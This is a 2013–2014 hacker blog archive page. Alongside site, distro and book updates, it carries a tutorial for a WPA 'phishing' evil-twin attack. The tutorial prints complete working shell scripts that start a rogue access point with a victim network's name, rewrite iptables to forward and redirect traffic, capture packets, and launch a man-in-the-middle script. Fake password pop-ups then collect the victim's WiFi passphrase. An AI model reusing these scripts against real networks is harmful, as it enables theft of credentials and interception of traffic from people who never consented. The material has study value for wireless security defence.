SoldierX.com SquidBlackList - the world's largest porn blacklist! HAX Radio - The stream the FBI Listens to! Offensive Security Wireless Professional PWNIE 2012 Nominations The Hip-Hop Realm

Archive for the ‘Updates’ Category

Site Updates

Wednesday, March 19th, 2014

I have decided that all of the fancy CSS3 stuff had to go. It looked bad on mobile devices and such. So, I have changed the look of the landing page and moved some things around here on the site itself. All publications are in one place, all music in one place, etc. Anyone want to let me kn ow how it all looks on their mobile device(s)? Thanks!

~Douglas

Bringing Back the WPA Phishing Attack

Friday, July 19th, 2013

It’s hard to keep up with every project I start since I am a one man band as of late. I do admit that I love the RF hacking projects the most! One of them, the WPA Phishing Attack, was a simple way to phish a WPA/WPA2/WPA2 Enterprise password without the use of FreeRADIUS-WPE. It simply creates a fake AP that a user can connect to outside of the physical area in which the victim AP is located. Then, it forwards all traffic through the attacker machine and when a web browser is opened by the victim, he or she will be resented with a fake Windows/OSX pop up window that “requires” a WiFi pass-phrase again.

For instance, say a Victim is using “WorkAP” and heads over to another building where the WorkAP or mesh does not reach. Next, the attacker starts the evil twin AP called “WorkAP” without any encryption enabled and awaits clients. (You MUST wai for clients before running the ./MiTM.sh file or Ettercap will kill the window) Usually what happens when someone sees an AP of the same name they just click connect. Once connected they are presented with a password input for the WiFi network once the browser opens. Here is a video presentation I made back in 2010 and published on YouTube in Feb of 2011:

This new tutorial below is another one provided by The Musket Team and was posted in the comments section of my original WPA Phishing Attack Presentation weblog post. I have edited it slightly and styled. Thank you Musket Team!

The WPA Phishing program in both WeakNet Linux 3.6 and 4.2 have several bugs.
For example In the WeaknetAP.sh file the:
firefox http://127.0.0.1/wpa-credcheck.php &
points to a file in the /var/www folder that does not exist. And there are others.

The Musket Team has gotten the program to run in both WeakNet Linux Versions. Here is a step by step method.
The program requires a dhcp-server file place in the /etc/init.d/ folder
Write the following with a text editor and name it dhcp-server Make sure in the properties-permissions you check to allow executing the file as a program.

#############start of dhcp-server file#########
###location= /etc/init.d/ #################
#!/bin/sh
#
#
#
### BEGIN INIT INFO
# Provides: dhcp-server
# Required-Start: $remote_fs $network $syslog
# Required-Stop: $remote_fs $network $syslog
# Should-Start: $local_fs slapd $named
# Should-Stop: $local_fs slapd
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: DHCP server
# Description: Dynamic Host Configuration Protocol Server
### END INIT INFO

PATH=/sbin:/bin:/usr/sbin:/usr/bin

test -f /usr/sbin/dhcpd || exit 0

# It is not safe to start if we don’t have a default configuration…
if [ ! -f /etc/default/dhcp-server ]; then
echo “/etc/default/dhcp-server does not exist! – Aborting…”
echo “Run ‘dpkg-reconfigure dhcp-server’ to fix the problem.”
exit 0
fi

. /lib/lsb/init-functions

# Read init script configuration (so far only interfaces the daemon
# should listen on.)
[ -f /etc/default/dhcp-server ] && . /etc/default/dhcp-server

NAME=dhcpd
DESC=”DHCP server”
DHCPDPID=/var/run/dhcpd.pid

test_config()
{
if ! /usr/sbin/dhcpd -t -q > /dev/null 2>&1; then
echo “dhcpd self-test failed. Please fix the config file.”
echo “The error was: ”
/usr/sbin/dhcpd -t
exit 1
fi
}

# single arg is -v for messages, -q for none
check_status()
{
if [ ! -r "$DHCPDPID" ]; then
test “$1″ != -v || echo “$NAME is not running.”
return 3
fi
if read pid /dev/null 2>&1; then
test “$1″ != -v || echo “$NAME is running.”
return 0
else
test “$1″ != -v || echo “$NAME is not running but $DHCPDPID exists.”
return 1
fi
}

case “$1″ in
start)
test_config
log_daemon_msg “Starting $DESC” “$NAME”
start-stop-daemon –start –quiet –pidfile $DHCPDPID \
–exec /usr/sbin/dhcpd — -q $INTERFACES
sleep 2

if check_status -q; then
log_end_msg 0
else
log_failure_msg “check syslog for diagnostics.”
log_end_msg 1
exit 1
fi
;;
stop)
log_daemon_msg “Stopping $DESC” “$NAME”
start-stop-daemon –stop –quiet –pidfile $DHCPDPID
log_end_msg $?
rm -f “$DHCPDPID”
;;
restart | force-reload)
test_config
$0 stop
sleep 2
$0 start
if [ "$?" != "0" ]; then
exit 1
fi
;;
status)
echo -n “Status of $DESC: ”
check_status -v
exit “$?”
;;
*)
echo “Usage: $0 {start|stop|restart|force-reload|status}”
exit 1
esac

exit 0
#############end of dhcp-server file ############

The WeaknetAP.sh file has other bugs. Here is a complete rewrite for you to test. Write the following with a text editor, name the file WeakNetAP.sh then copy to /pwnt/WiFu/airbase-ng/. Again make sure in the properties-permissions you check to allow executing the file as a program.

#################start of WeakNetAP.sh ################
# location= /pwnt/WiFu/airbase-ng/
#!/bin/bash
# WeakAP startup script: (c) 2010 GNU License.
#
# Written by Trevelyn
# Douglas[at]WeakNetLabs[dot]com
# for WeakNet Linux 4.2i
#
# This creates a Rogue AP from your device,
# Starts DHCP Server in the range 192.168.0.0,
# Forwards all traffic caught to your internet connection
# and starts capturing packets, creating a PCAP file.
# –> Creating a highly advanced MITM attack.
#
# This script was meant to an “out of the box” attack
# setup for WeakNet linux Version 4.2i users.
#
# This application comes without warranty, I am not responsible
# For any damages caused by using this script.
#
# Please refer to the GNU license included in the Tarball.
#
# Start the web server now:
/etc/init.d/lighttpd start
# open firefox to the credentials checker:
firefox http://127.0.0.1/wpa.php &
#
devchk=`iwconfig 2>/dev/null | grep Monitor`;
# clean up services before starting…
/etc/init.d/dhcp3-server stop
killall -9 dhclient
killall -9 dhclient3
killall -9 dnsspoof
killall -9 ettercap
# begin:
echo “<<>>”
if [ "$devchk" != "" ]; then
echo “[ + ] Good you have a Monitor enabled WiFu Device :-)”
else
echo “[ X ] You have no Monitor mode enabled device!”
echo “[ X ] Let’s create one…”
devmk=`iwconfig 2>/dev/null | grep -m 1 IEEE | awk ‘{print $1}’`
ifconfig $devmk up && iwconfig $devmk channel 11
echo “[ + ] Creating device from $devmk”
if [ "$devmk" = "ath0" ]; then
airmon-ng stop ath0;
airmon-ng start wifi0;
else
airmon-ng start $devmk 2>/dev/null
fi

DEV=`iwconfig 2>/dev/null | grep -m 1 IEEE | awk ‘{print $1}’`
iwconfig $DEV channel 11
iwconfig $DEV channel 11
iwconfig $DEV channel 11
if [ "$DEV" != "" ]; then
echo “[ ! ] Done, our new device is $DEV”
else
echo “[ X ] Something went really wrong! :-(”
echo “[ X ] Please Check your settings and try again.”
fi
fi
DEV=`iwconfig 2>/dev/null | grep Monitor | awk ‘{print $1}’`
echo “Shall we use $DEV as our Monitor device? (y/n)”
read foo;

if [ $foo = "n" ]
then echo “Which monitor enabled device shall I use?”
read DEV
fi

echo “What would you like to name the AP? (ESSID)”
read ESSID
echo “What would you like to name the AP? (CHANNEL)”
read CHANNEL
echo “[ + ] Starting soft AP in new Eterm window, for debugging with $DEV”
echo “[ > ] And ESSID: $ESSID”
echo “[ > ] And CHANNEL: $CHANNEL”
Eterm -e sh -c “airbase-ng -c $CHANNEL -C 30 –essid $ESSID -v $DEV; bash” &
sleep 2;
echo “[ + ] adding route for packet forwarding…”
ifconfig at0 up 192.168.0.1
ifconfig at0 netmask 255.255.255.0
ff=`ifconfig | grep “at0″ | awk ‘{print $1}’`
if [ "$ff" = "at0" ]
then echo “[ + ] at0 is on and up”
else echo “[ X ] at0 is not up, something went wrong”
fi
echo “[ + ] at0 device is now in IP range: 192.168.0.1~254…”
route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.0.1
echo “[ + ] cleaning out iptables settings…”
iptables –flush
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
echo “[ + ] changing iptables to forward packets…”
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o at0 -j MASQUERADE
echo “[ + ] changing ‘/proc/sys/net/ipv4/ip_forward’ to allow forwarding…”
echo 1 > /proc/sys/net/ipv4/ip_forward
echo “[ + ] Adding new rules to iptables to forward packets from at0 to wlan0″
echo “[ > ] Make sure you have an IP with wlan0!”
iptables -t nat -A PREROUTING -p udp –dport 53 -j DNAT –to 10.10.0.1
iptables –table nat –append POSTROUTING –out-interface wlan0 -j MASQUERADE
iptables –append FORWARD –in-interface at0 -j ACCEPT
echo “[ + ] Backing up DHCP3 configuration file to /etc/dhcp3/dhcpd.conf.backup…”
cp /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
echo “[ + ] Dumping contents from /pwnt/WiFu/airbase-ng/dhcpd3-server.conf into /etc/dhcp3/ file…”
cat dhcpd3-server.conf > /etc/dhcp3/dhcpd.conf
ifconfig at0 up 192.168.0.1 netmask 255.255.255.0
/etc/init.d/lighttpd start
echo “[ + ] Starting DHCP server with configuration from /etc/dhcp3/dhcpd.conf”
/etc/init.d/isc-dhcp-server start
echo “[ ! ] All done with script, hope all is up and running! :-)”
echo “[ ? ] Would you like to start a MITM attack against all requests?”
echo “[ ! ] Wait until you see an association in the airbase-ng window before running.”
echo “[ ! ] If it fails, simply run ./MITM.sh again until it starts.”
echo “[ ? ] This is perfect for faking RADIUS authentication.”
echo “[ ? ] (y/n)?”
read ans
if [ "$ans" = "y" ]
then ./MITM.sh &
else
echo “Okay Then!”
fi
#################end of WeakNetAP.sh ################

Other considerations. We suggest you start your wifi adapter in monitor mode before you run the program. At start you might get error messages as the program tries to kill nonexistant programs

You must download WPA phishing files from WeakNet Labs then place them in the /var/www/ folder. Make sure you allow read-write to these files and Again make sure in the properties-permissions you check to allow executing these files as a program. If firefox gives you the wrong files etc point it to 127.0.0.1 and/or make sure the permissions are correct then shut down restart and go phishing again.

You can keep the original WeakNetAP.sh just rename to WeakNetAP.sh.orig

WEAKERTH4N: Blue Ghost BETA v1.5

Sunday, March 17th, 2013

I recompiled the kernel with better Netfilter support and even more wifi drivers – I recompiled the NVIDIA 310 driver and compat-drivers. I added FreeRADIUS WPE, hostapd, hashcat, more scripts, and even on screen display scripts. (the WiFi one was m33b0′s idea). Also, I added more Hardware hacking utilities, Android hacking utilities, and changed the Grub screen resolution and configuration for faster booting.

Download it now! (hr.weaknetlabs.com) Thank you HaxRadio for hosting! :D

~Douglas

Book Published!

Friday, January 18th, 2013

01.18.2013 – RAIDING the Wireless Empire has been published!

Physical books

Purchase from publisher: https://www.createspace.com/3558592
Purchase signed copy from us: WeakNetLabs/book/

eBook Version from Amazon

Kindle version and physical book will be available on Amazon in approximately 12 hours. Click the image below to see what it looks like on the Kindle Fire HD.

Thank you all for following my site over the years! So far, it’s been a fun ride :) So, here is a small free preview from the book in PDF format:

Thank you Fixer and Brad Carter for all of the help!

~Douglas.

Simple Google Text Browser, Book, Soundcloud

Monday, January 7th, 2013

pWeb Suite

./sgtb has been updated to accept complicated Google dorks, thanks to a BUG found by m33b0! :) Click Here for the updated version and thanks for all of the feedback on the pWeb Suite! :)

Tested new dork example:

I’m still trying my best to get rid of all of the garbage that Google throws into its search results. It sadly seems that as time goes by, the simple search engine is getting more and more convoluted and full of ads and garbage. I was sad the day they dropped this style of dork: ‘”a string goes here”+word’ but whatever, they need profits too, I guess. This is really why I made this application anyways. Plus the bot protection is awful and blocks almost 60% of all Tor IPs.

book

Thanks for all the inquiries about the book, it will be available here soon and is complete. I am just waiting for the final edit from the editor.

Music

Not sure if you guise noticed or not, but I changed the icons in the bottom left of the site and moved some music off to our very own Soundcloud site!

Thanks!
~Douglas